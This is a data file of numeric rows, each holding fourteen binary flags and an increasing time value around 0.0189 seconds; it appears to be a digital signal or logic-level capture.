1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8865900e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8865908e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8865956e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8865980e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8866028e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8866052e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8866104e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8866128e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8866180e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8866204e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8866208e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8866228e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8866252e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8866260e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8866276e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8866300e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8866328e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8866352e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8866356e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8866404e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8866428e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8866436e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8866452e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8866476e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8866500e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8866528e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8866552e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8866580e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8866604e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8866628e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8866652e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8866676e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8866684e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8866728e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8866752e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8866780e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8866804e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8866812e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8866852e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8866876e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8866928e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8866952e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8867004e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8867028e-02 1,1,1,1,1,0,0,0,0,1,0,0,0,0,1.8867032e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8867036e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8867052e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8867076e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8867084e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8867100e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8867128e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8867152e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8867180e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8867204e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8867228e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8867252e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8867276e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8867300e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8867328e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8867332e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8867380e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8867404e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8867412e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8867428e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8867452e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8867476e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8867500e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8867528e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8867552e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8867556e-02 1,1,1,1,1,1,0,0,0,1,0,0,1,0,1.8867604e-02 1,1,1,1,1,1,0,0,0,1,0,0,0,0,1.8867628e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8867636e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8867652e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8867676e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8867700e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8867728e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8867752e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8867780e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8867804e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8867828e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8867852e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8867876e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8867900e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8867924e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8867948e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8867976e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8868000e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8868028e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8868052e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8868076e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8868100e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8868124e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8868148e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8868176e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8868200e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8868228e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8868252e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8868276e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8868300e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8868324e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8868348e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8868376e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8868400e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8868428e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8868452e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8868476e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8868500e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8868524e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8868548e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8868576e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8868600e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8868628e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8868652e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8868676e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8868700e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8868724e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8868748e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8868772e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8868800e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8868828e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8868852e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8868876e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8868900e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8868924e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8868948e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8868976e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8869000e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8869028e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8869052e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8869076e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8869100e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8869124e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8869148e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8869176e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8869200e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8869228e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8869252e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8869276e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8869300e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8869324e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8869348e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8869372e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8869400e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8869428e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8869452e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8869476e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8869500e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8869524e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8869548e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8869576e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8869600e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8869628e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8869652e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8869676e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8869700e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8869724e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8869748e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8869776e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8869800e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8869828e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8869852e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8869876e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8869900e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8869924e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8869948e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8869972e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8870000e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8870028e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8870052e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8870076e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8870100e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8870124e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8870148e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8870176e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8870200e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8870228e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8870252e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8870276e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8870300e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8870324e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8870348e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8870380e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8870400e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8870428e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8870452e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8870476e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8870500e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8870524e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8870548e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8870576e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8870600e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8870628e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8870652e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8870676e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8870700e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8870724e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8870748e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8870776e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8870800e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8870828e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8870852e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8870876e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8870900e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8870924e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8870948e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8870976e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8871000e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8871028e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8871052e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8871076e-02 1,1,1,1,1,0,0,0,0,0,0,0,1,0,1.8871100e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,0,1.8871124e-02 1,1,1,1,1,0,0,0,0,0,0,0,0,1,1.8994792e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,1.8994952e-02 0,0,0,0,0,0,0,0,0,0,0,1,0,1,1.8994988e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,1.8995012e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,1,1.8995308e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,1.8995332e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,1,1.8995356e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,1.8995380e-02 0,0,0,0,0,0,1,0,0,0,0,0,0,1,1.8995384e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,1,1.8995388e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,1,1.8995404e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,1,1.8995428e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,1.8995436e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,1,1.8995452e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,1.8995476e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,1,1.8995484e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,1,1.8995500e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,1,1.8995528e-02 0,0,0,0,0,0,0,0,0,0,1,0,0,1,1.8995532e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,1,1.8995536e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,1,1.8995552e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8995560e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8995580e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8995604e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8995628e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8995652e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8995676e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.8995684e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.8995700e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.8995728e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.8995752e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.8995780e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.8995804e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.8995828e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8995836e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8995852e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8995876e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.8995884e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.8995900e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.8995928e-02 0,0,0,0,0,0,0,0,0,0,1,0,0,0,1.8995932e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8995936e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8995956e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.8995980e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.8996004e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.8996028e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8996036e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8996052e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8996076e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8996100e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8996128e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8996156e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8996180e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8996204e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8996228e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.8996232e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.8996252e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.8996276e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8996284e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8996304e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8996328e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8996352e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.8996380e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.8996404e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.8996428e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.8996452e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.8996476e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.8996500e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.8996528e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8996532e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8996552e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.8996580e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.8996604e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.8996628e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8996636e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8996652e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8996676e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8996700e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8996728e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.8996732e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.8996752e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.8996780e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.8996804e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.8996828e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.8996852e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.8996876e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.8996900e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.8996928e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8996932e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8996952e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8996980e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8997004e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8997028e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8997052e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8997076e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.8997084e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.8997100e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.8997128e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8997132e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8997152e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8997180e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8997204e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8997228e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8997252e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8997276e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8997300e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8997328e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8997352e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.8997380e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.8997404e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.8997428e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8997436e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8997452e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8997476e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.8997484e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.8997500e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.8997528e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.8997552e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.8997580e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.8997604e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.8997628e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8997636e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8997652e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8997676e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8997700e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8997728e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8997752e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8997780e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8997804e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8997828e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8997852e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8997876e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8997900e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8997928e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.8997932e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.8997952e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.8997980e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8997984e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8998004e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8998028e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8998052e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8998076e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8998100e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8998128e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.8998132e-02 0,0,0,0,0,0,1,0,0,0,1,0,1,0,1.8998152e-02 0,0,0,0,0,0,1,0,0,0,1,0,0,0,1.8998180e-02 0,0,0,0,0,0,0,0,0,0,1,0,0,0,1.8998184e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8998188e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8998204e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8998228e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8998252e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8998276e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8998300e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8998328e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8998352e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8998380e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8998404e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8998428e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8998452e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8998476e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8998500e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8998528e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8998552e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8998580e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8998604e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8998628e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8998652e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8998676e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8998700e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8998728e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8998752e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8998780e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8998804e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8998828e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8998852e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8998876e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8998900e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8998928e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8998952e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8998980e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8999004e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8999028e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8999052e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8999076e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8999100e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8999128e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8999152e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8999176e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8999200e-02 0,0,0,0,0,0,0,0,0,0,0,0,0,0,1.8999228e-02 0,0,0,0,0,0,0,0,0,0,0,0,1,0,1.8999252e-02 